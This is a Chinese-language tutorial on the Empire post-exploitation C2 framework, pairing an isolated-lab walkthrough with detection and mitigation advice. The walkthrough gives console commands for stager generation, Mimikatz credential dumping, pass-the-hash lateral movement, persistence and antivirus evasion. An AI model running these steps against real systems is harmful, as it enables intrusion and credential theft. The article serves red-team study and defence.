1. 项目概述一个已落幕的渗透测试框架如果你在网络安全特别是红队攻防领域摸爬滚打过几年那你大概率听说过Empire这个名字。它曾经是渗透测试和红队评估中不可或缺的“瑞士军刀”一个集成了 PowerShell 和 Python 代理的后期利用框架。简单来说它的核心价值在于当你通过某种方式比如一个钓鱼邮件、一个Web漏洞初步进入了一台目标机器我们称之为“立足点”后Empire 能帮你在这个立足点上建立一个稳固、隐蔽的“指挥控制”通道。通过这个通道你可以像操作自己电脑一样深入探索目标内网、窃取数据、横向移动而这一切操作都力求绕过杀毒软件和网络监控的检测。Empire 最初是 PowerShell Empire 和 Python EmPyre 两个项目的合并体。它的强大之处在于其“无文件”和“内存中”执行的特性。对于 Windows 目标它可以使用纯 PowerShell 2.0 脚本在内存中运行代理完全不需要将powershell.exe进程落地到磁盘这大大降低了被传统杀毒软件基于文件特征检测的风险。对于 Linux 和 macOS 目标则使用纯 Python 2.6/2.7 代理。整个框架的通信过程设计为加密的架构也非常灵活允许测试人员快速部署从键盘记录到凭证窃取如集成 Mimikatz 功能等各种后期利用模块。然而正如项目仓库首页最显眼的那行字所宣告的“This project is no longer supported.”Empire 项目已经停止了官方维护和支持。这对于安全从业者意味着什么意味着它不再接收安全更新已知的漏洞不会被修复随着操作系统和安防技术的演进其规避检测的能力会逐渐下降直接在生产或测试环境中使用可能带来不可预知的风险。但另一方面研究一个已经“定型”的经典框架对于理解攻击者APT组织、黑产的战术、技术和程序以及构建更有效的防御检测策略仍然具有极高的学习价值。所以这篇文章的目的不是教你怎么用它去攻击而是以一个防御者和研究者的视角深度拆解 Empire 的设计思想、运作原理并分享在可控实验环境如隔离的虚拟机或靶场中搭建、分析和学习它的实践经验与避坑指南。2. 核心架构与通信原理深度解析要真正理解一个工具尤其是像 Empire 这样的复杂框架不能只停留在敲命令的层面必须深入其架构和通信模型。这能帮助你在遇到问题时快速定位也能让你更好地理解防御方应该在哪里布防。2.1 框架的组件构成Empire 采用经典的C2 (Command Control)架构即“服务端-客户端”模型但在 Empire 的语境里我们通常称服务端为Empire Server或Listener称客户端为Agent或Stager。服务端这是攻击者控制的机器。它运行着 Empire 的主程序核心是一个 Web 服务器默认使用 Flask和一个数据库默认使用 SQLite。服务端负责创建和管理监听器监听器定义了一个“服务端口”和通信协议如 HTTP, HTTPS, DNS等待被植入的客户端连接回来。生成载荷根据监听器的配置生成一段能在目标机器上执行的初始代码PowerShell 一行命令、VBScript、宏代码等这段代码就是Stager。管理代理一旦Stager在目标上执行并成功回连服务端就会与目标建立一个加密的、持久的会话这个会话实体就是Agent。服务端可以向Agent下发任务模块并接收任务执行结果。提供交互式控制台一个类似 Metasploit 的交互式界面让操作者可以方便地管理监听器、代理、执行模块等。客户端这是在目标系统上运行的恶意代码实体。Stager可以理解为“安装程序”。它的唯一使命就是连接回服务端指定的监听器下载更完整、功能更强大的第二阶段代码即Agent到内存中执行。Stager 通常非常小巧可能只是一行经过混淆和编码的 PowerShell 命令便于通过鱼叉式钓鱼邮件、漏洞利用等方式投递。Agent这是真正的“后期利用平台”。它常驻在目标内存中与服务端保持心跳连接接收指令执行对应的模块如mimikatz、portscan、keylogger并将结果加密传回。Agent 实现了完整的通信加密、任务调度和结果回传逻辑。2.2 通信流程与加密机制Empire 的通信安全是其一大亮点。它默认使用AES-256对称加密来保护Agent与Listener之间的所有通信内容。但这里有一个关键问题对称加密需要双方共享同一个密钥这个密钥如何在从未接触过的攻击者和受害者机器之间安全地交换Empire 采用了一个巧妙的“预共享密钥”模型其流程如下密钥生成当你在 Empire 服务端创建一个监听器时服务端会为这个监听器生成一个唯一的AES 加密密钥和一个通信验证密钥。这两个密钥被硬编码在随后为该监听器生成的所有Stager代码中。Stager 执行当Stager在目标机器上运行时它使用硬编码的通信参数如IP、端口、URI和验证密钥向监听器发起一个初始的 HTTP 请求。这个请求的 body 中包含了目标的一些基础信息如主机名、用户名、进程ID等并使用 AES 密钥加密。Agent 注册服务端收到请求后用对应的 AES 密钥解密验证信息。如果验证通过服务端会为这个新连接生成一个唯一的Agent ID和Session ID然后将完整的Agent代码也是一个 PowerShell 脚本作为 HTTP 响应返回给Stager。这个响应同样是加密的。建立持久会话Stager在内存中解密并执行返回的Agent代码。从此Agent便以独立的进程或线程运行并以一定的间隔可配置称为Sleep时间向服务端发送心跳包询问是否有新任务。所有任务指令和结果都通过 AES-256 加密的 HTTP 请求/响应进行交换。注意这种“预共享密钥”模式意味着一旦攻击者创建的监听器密钥泄露例如通过分析生成的 Stager 样本所有使用该监听器的通信都可以被解密和模拟。因此在实际的对抗中高水平的攻击者会频繁更换监听器和 Stager。作为防御方提取并分析 Stager 中的硬编码密钥是进行威胁狩猎和关联分析的重要突破口。2.3 模块化设计与扩展性Empire 的强大功能源于其丰富的模块库。模块分为几大类收集模块用于收集系统信息、网络信息、凭证等。权限提升模块利用系统漏洞或配置弱点提升代理权限。横向移动模块通过 WMI、Psexec、计划任务、Pass-the-Hash 等方式在内网中移动。持久化模块通过注册表、启动项、服务、WMI 事件订阅等方式实现持久化驻留。规避模块尝试关闭安全软件、清除日志、混淆内存等。每个模块本质上是一个 Python 脚本位于./lib/modules/它定义了模块的元数据名称、描述、作者、所需的参数以及最重要的生成最终要在目标上执行的 PowerShell 或 Python 代码的逻辑。这种设计使得有经验的用户能够非常方便地根据自己需求编写自定义模块这也是 Empire 社区一度非常活跃的原因。3. 在隔离实验环境中的部署与配置实操郑重声明以下所有操作仅应在你拥有完全控制权的隔离实验环境中进行例如本地虚拟机VMware, VirtualBox组成的封闭网络或专门的渗透测试靶场如 VulnHub, HackTheBox 的某些靶机。严禁对任何未经授权的系统进行测试。3.1 环境准备与安装由于官方支持已停止且项目依赖的 Python 2.7 也已淘汰直接安装原版 Empire 可能会遇到大量依赖冲突。这里推荐两种相对稳定的实验方案方案一使用 Docker推荐最便捷这是目前最干净、最不容易出错的方式。Empire 项目提供了官方 Docker 镜像。# 拉取 Empire 的 Docker 镜像 docker pull empireproject/empire # 运行 Empire 容器并将本地端口映射到容器的 Empire 服务端口默认1337 # -it 表示交互式终端--rm 表示容器退出后自动删除测试用 -p 映射端口 docker run -it --rm -p 1337:1337 empireproject/empire执行后你会直接进入 Empire 的控制台。Docker 镜像已经帮你解决了所有依赖问题。方案二在 Kali Linux 虚拟机中手动安装用于深入学习如果你想更深入地了解其文件结构和依赖可以在一个全新的 Kali Linux 虚拟机中尝试。但请注意即使是在 Kali 上也可能需要处理一些陈旧的依赖。# 1. 克隆项目仓库注意项目已归档这是最后的版本 git clone --depth 1 https://github.com/EmpireProject/Empire.git cd Empire # 2. 尝试运行安装脚本 sudo ./setup/install.sh # 3. 安装脚本很可能会失败因为 Python 2.7 的 pip 源和依赖包可能已失效。 # 此时需要手动处理。一个常见的技巧是使用 Python 虚拟环境。 sudo apt install python2.7 python2.7-dev python-pip -y pip2 install --upgrade pip setuptools # 然后根据安装脚本install.sh和 requirements.txt 的内容手动 pip2 install 缺失的包。 # 这过程可能非常繁琐需要你有一定的排错能力。实操心得对于绝大多数以学习和研究为目的的测试者强烈建议使用 Docker 方案。它能将环境隔离避免污染你的宿主机也省去了数小时甚至数天处理依赖冲突的痛苦。手动安装的价值仅在于你需要修改 Empire 源码或进行二次开发时。3.2 基础配置与第一个监听器假设我们通过 Docker 成功启动了 Empire。你会看到一个(Empire) 的命令提示符。启动一个 HTTP 监听器(Empire) listeners (Empire: listeners) uselistener http (Empire: listeners/http) set Name test_http (Empire: listeners/http) set Host 192.168.1.100 # 这里填写你 Empire 服务端即容器或 Kali的IP (Empire: listeners/http) set Port 8080 (Empire: listeners/http) execute执行execute后如果看到[*] Starting listener test_http说明监听器已成功启动。你可以用listeners命令查看所有活跃的监听器。生成一个 Stager监听器是“电话总机”我们需要生成“电话号码”发给目标。(Empire) usestager multi/launcher (Empire: stager/multi/launcher) set Listener test_http (Empire: stager/multi/launcher) generate执行generate后会输出一行长长的、经过 Base64 编码的 PowerShell 命令。这行命令就是Stager。它的作用是在目标机器上执行连接回我们的监听器下载并运行完整的Agent。3.3 模拟攻击在目标虚拟机中执行 Stager现在我们需要一个“目标”。在同一个虚拟网络内启动一台 Windows 10 或 Windows Server 的虚拟机确保其能与 Empire 服务端 IP 互通。在目标 Windows 虚拟机上以管理员身份打开 PowerShell。将刚才生成的那行长长的命令完整地复制粘贴到 PowerShell 中执行。如果网络和防火墙设置正确几秒钟后你会在 Empire 控制台看到提示一个新的Agent已经上线。(Empire) agents [*] Active agents: Name Lang Internal IP Machine Name Username Process Delay Last Seen ---- ---- ----------- ------------ -------- ------- ----- --------- TWV7GTH… PS 192.168.1.101 WIN-TARGET WIN-TARGET\Administrator powershell/4260 5/0.0 2023-10-27 …与 Agent 交互使用interact Agent_Name命令例如interact TWV7GTH…进入该代理的交互模式。然后你就可以像操作自己的 Shell 一样操作目标机器了。(Empire: TWV7GTH…) shell whoami (Empire: TWV7GTH…) sysinfo (Empire: TWV7GTH…) usemodule credentials/mimikatz/logonpasswords (Empire: powershell/credentials/mimikatz/logonpasswords) execute重要注意事项在实验环境中Windows Defender 或其他杀毒软件很可能会拦截并杀掉 Empire 的 Agent 进程因为其内存特征和网络行为已被广泛收录。为了实验顺利进行你可以在目标虚拟机上临时关闭实时保护或者使用 Empire 内置的bypassuac、mimikatz等模块尝试绕过。但这本身就是学习的一部分理解现代 EDR 如何检测此类工具。4. 模块使用详解与内网横向移动演练当 Agent 成功上线后Empire 的真正威力才展现出来。它不是一个简单的远程 Shell而是一个功能丰富的后期利用平台。4.1 常用模块分类与使用在 Agent 交互模式下输入usemodule后按 Tab 键可以查看所有可用模块。它们按功能分类在子目录下。信息收集usemodule situational_awareness/host/antivirusproduct # 查看杀软 usemodule situational_awareness/network/powerview/get_user # 获取域用户信息需在域内 usemodule situational_awareness/network/powerview/get_netdomaincontroller # 获取域控 set Agent Agent_Name # 如果不在当前交互的Agent需要指定 executePowerView 是 Empire 中一个极其强大的信息收集模块集合它封装了大量用于 Active Directory 查询的 PowerShell 函数。权限提升usemodule privesc/bypassuac # 尝试绕过UAC usemodule privesc/ms16-032 # 利用MS16-032本地提权漏洞需目标系统未打补丁执行这些模块需要当前 Agent 具有一定的权限通常是普通用户权限。成功后可能会返回一个新的、具有更高权限如 SYSTEM的 Agent。凭证窃取usemodule credentials/mimikatz/logonpasswords # 抓取内存中的明文密码和哈希 usemodule credentials/mimikatz/lsadump # 尝试转储LSA SecretsMimikatz 是神器但也是被杀软重点关照的对象。Empire 的版本经过高度混淆和拆分但依然可能触发检测。横向移动这是红队评估的核心。# 1. 使用抓取到的哈希进行“传递哈希”攻击 usemodule credentials/tokens # 先检查当前是否有可用的令牌 usemodule lateral_movement/invoke_wmi # 使用WMI在远程主机执行命令可指定哈希 set ComputerName 192.168.1.102 # 目标内网另一台机器 set Hash 抓取到的NTLM哈希 set Command “powershell -enc 生成的新Stager” # 让目标机器执行Stager回连到新监听器 execute # 2. 使用PsExec方式会创建服务动静较大 usemodule lateral_movement/invoke_psexec set ComputerName 192.168.1.102 set Username Administrator set Hash NTLM哈希 set Listener new_http_listener # 需要提前创建另一个监听器用于接收新会话 execute横向移动成功后你会在 Empire 控制台看到来自新主机192.168.1.102的 Agent 上线。持久化usemodule persistence/userland/registry # 注册表启动项 usemodule persistence/elevated/wmi # WMI事件订阅隐蔽性高持久化模块的目的是确保即使目标重启你的 Agent 也能重新上线。每个模块都有其优缺点和检测难度。4.2 构建一个简单的内网横向移动实验场景为了更真实地模拟我们可以在虚拟机中搭建一个简单的内网环境攻击机Kali Linux (运行 Empire Docker) IP: 192.168.1.100域成员服务器Windows Server 2016 (已加入域) IP: 192.168.1.101 这是我们的初始立足点。域内工作站Windows 10 IP: 192.168.1.102。域控制器Windows Server 2019 IP: 192.168.1.10。实验步骤在攻击机上启动 Empire创建 HTTP 监听器listener_http。通过模拟钓鱼等方式在域成员服务器上执行 Stager获得第一个 AgentAgent01。通过Agent01使用credentials/mimikatz/logonpasswords模块尝试抓取本地管理员或当前域用户的哈希。假设抓取到了域用户DOMAIN\user1的哈希。使用lateral_movement/invoke_wmi模块将该哈希用于对域内工作站的攻击。命令设置为让工作站执行一个新的 Stager指向另一个监听器listener_http2。观察 Empire 控制台成功的话会看到来自工作站的新 AgentAgent02上线。通过Agent02可以尝试使用powerview系列模块枚举域内信息定位域控制器并尝试使用抓取到的域管哈希或利用漏洞向域控制器发起攻击。这个简单的流程涵盖了初期突破、信息收集、凭证窃取、横向移动等关键阶段是理解内网渗透测试基础链路的绝佳实践。5. 防御视角检测与缓解 Empire 攻击作为一名安全从业者只懂攻击是不够的更重要的是知道如何防御。研究 Empire 的最终目的是为了更好地发现和阻止它。5.1 基于主机的检测点进程与命令行检测可疑的 PowerShell 进程查看是否有powershell.exe进程带有长串的、经过 Base64 编码的命令行参数-enc参数。这是 Empire Stager 的典型特征。可以部署 Sysmon 等工具记录所有进程创建事件和命令行参数并设置告警规则。无文件执行Empire Agent 运行在powershell进程的内存中。检查是否有powershell进程长时间运行、网络连接活跃但其磁盘上不存在对应的脚本文件。父进程异常一个由word.exe或outlook.exe启动的powershell.exe进程通常值得怀疑。加载模块检测Empire 的很多功能依赖于反射加载 .NET 程序集到内存中。监控powershell进程对System.Reflection.Assembly.Load的调用特别是加载来自非标准位置或内存缓冲区的程序集。持久化机制检测定期检查常见的持久化位置如注册表Run键、计划任务、服务、WMI 事件过滤器/消费者绑定等寻找可疑条目。5.2 基于网络的检测点通信模式固定心跳Empire Agent 默认以固定的Sleep间隔如5秒发送心跳请求。在网络流量中寻找周期性、规律性的 HTTP POST 请求其目标IP和端口固定且请求大小相似。URI 路径默认的 Empire HTTP 监听器使用类似/admin/get.php,/news.php的路径。虽然可以修改但这些路径名有时仍具有特征性。User-Agent早期版本的 Empire 使用默认的 User-Agent如Mozilla/5.0...但版本信息固定。可以检查 User-Agent 的异常。加密流量特征虽然内容加密但 TLS 握手阶段的 JA3/JA3S 指纹、证书信息如果使用自签名 HTTPS可能具有特征。Empire 生成的证书有其默认属性。流量解密与重放如果通过端点检测捕获了 Stager 的原始代码可以从中提取出硬编码的 AES 密钥和通信密钥。利用这些密钥可以解密捕获到的网络流量看到完整的 C2 指令和窃取的数据。这对于事件响应和威胁归因至关重要。5.3 缓解与防护建议应用白名单在企业环境中严格限制 PowerShell 的执行。只允许签名的脚本运行通过执行策略AllSigned或者仅在特定管理机上允许使用 PowerShell。增强日志记录启用 PowerShell 的模块日志记录、脚本块日志记录和转录功能。这些日志会记录 PowerShell 执行的命令和脚本内容是发现 Empire 等无文件攻击的宝贵数据源。网络分段与监控对关键服务器和域控制器实施严格的网络访问控制限制不必要的横向通信。部署网络检测与响应系统对出站流量进行深度分析寻找 C2 通信模式。终端检测与响应部署具备行为检测能力的 EDR 产品。EDR 可以监控进程行为序列例如powershell进程在内存中加载 Mimikatz 功能模块、进行网络连接、访问 LSASS 进程内存即使单个行为看起来无害但组合起来就能构成高置信度的恶意告警。定期红队演练最好的防御是了解攻击。定期聘请或组织内部红队进行模拟攻击使用 Empire 等工具检验蓝队的检测和响应能力并不断优化安全策略。6. 常见问题排查与实验技巧实录在搭建和使用 Empire 进行实验的过程中你几乎一定会遇到各种问题。下面记录了一些典型问题的解决思路和我踩过的坑。6.1 Agent 无法上线这是最常见的问题。问题现象可能原因排查步骤执行 Stager 后无反应1. 网络不通2. 防火墙拦截3. Stager 命令错误4. 杀软拦截1. 在目标机 ping Empire 服务器 IP确认连通性。2. 检查 Empire 服务器防火墙是否放行了监听端口如8080。3.仔细核对 Stager 命令确保复制完整特别是开头结尾的引号或括号。在目标机 PowerShell 中可以先执行$ErrorActionPreferenceSilentlyContinue再执行 Stager避免因非致命错误导致中断。4. 临时关闭目标机杀软实时监控再试。提示“无法连接”或超时1. 监听器配置的 Host/IP 错误2. 出站防火墙规则1. 在 Empire 中用listeners查看监听器详情确认Host字段是目标机能访问到的IP如果是 Docker可能是宿主机的IP而不是容器内部的172.x.x.x。2. 在目标机尝试用Test-NetConnection Empire_IP -Port 8080测试端口连通性。Stager 执行后报错 如“无法加载指定模块”PowerShell 执行策略限制或环境问题1. 以管理员身份运行 PowerShell。2. 临时放宽执行策略Set-ExecutionPolicy Bypass -Scope Process。3. 确保目标系统是 Windows 7 且安装了 .NET Framework 2.0 和 PowerShell 2.0。6.2 模块执行失败或返回空结果问题现象可能原因排查步骤mimikatz模块执行后无输出或报错1. 权限不足2. 被杀软/EDR 内存扫描阻断3. 目标系统版本问题1. 使用getuid命令确认 Agent 权限尝试使用bypassuac或漏洞提权模块获取更高权限。2. 这是最常见原因。在实验环境中可临时禁用杀软。在实际检测中这正是 EDR 的价值所在。3. 某些旧版 Mimikatz 功能在新版 Windows 上可能失效。shell命令执行后卡住或无回显1. 命令本身需要交互或长时间运行2. 管道或重定向问题1. 避免执行需要前台交互的命令如notepad。对于ping -t这类命令使用-TimeOut参数或CtrlC中断。2. 在命令中正确使用引号例如shell “dir C:\”。PowerView 模块返回“拒绝访问”当前 Agent 身份权限不足无法查询域信息1. 确认目标机是否已加入域当前用户是否是域用户。2. 尝试使用credentials/mimikatz抓取更高权限的令牌或哈希然后用steal_token或pth模块切换身份。6.3 Docker 环境下的特殊问题网络模式问题默认的bridge网络模式下Docker 容器有自己的 IP 段如172.17.0.x。目标虚拟机可能无法直接访问这个 IP。解决方案运行容器时使用--network host参数让容器共享宿主机的网络栈这样监听器的Host直接设为宿主机 IP 即可。或者在虚拟机网络中正确配置路由和防火墙使目标机能访问到 Docker 容器的 IP。数据持久化默认的--rm参数会在容器退出时删除所有数据包括数据库、下载的文件等。如果你想保存 Empire 的配置和历史记录可以使用 Docker 卷挂载docker run -it --rm -p 1337:1337 -v /path/on/host:/empire/data empireproject/empire6.4 实验环境搭建技巧快照是救星在搭建复杂的域环境DC、成员服务器、工作站时每完成一个关键步骤如安装系统、加域、配置基础服务就给虚拟机创建一个快照。这样当实验出错或需要重置时可以快速回滚节省大量时间。使用隔离网络在 VMware 或 VirtualBox 中创建一个“仅主机”或“内部网络”模式的虚拟网络将所有实验机器攻击机、靶机都连接到此网络。这可以确保实验流量不会泄露到你的真实网络也避免了外部干扰。记录与复盘实验过程中用笔记软件记录下每一步操作、命令和结果。遇到错误时记录下完整的错误信息和你的排查过程。实验结束后进行复盘攻击链路是如何打通的防御在哪里失效了如何改进检测规则这个过程比单纯执行命令更有价值。Empire 作为一个已经停止维护的项目其技术本身或许正在过时但它所体现的攻击思想、框架设计、规避技巧仍然是现代攻防对抗中的经典教材。通过亲手搭建、使用并分析它你不仅能更深刻地理解攻击者的行为模式更能从防御者的角度思考如何构建更有效的安全防线。记住工具是死的思维是活的。在安全这条路上保持好奇持续学习深度思考远比掌握某一个特定工具更重要。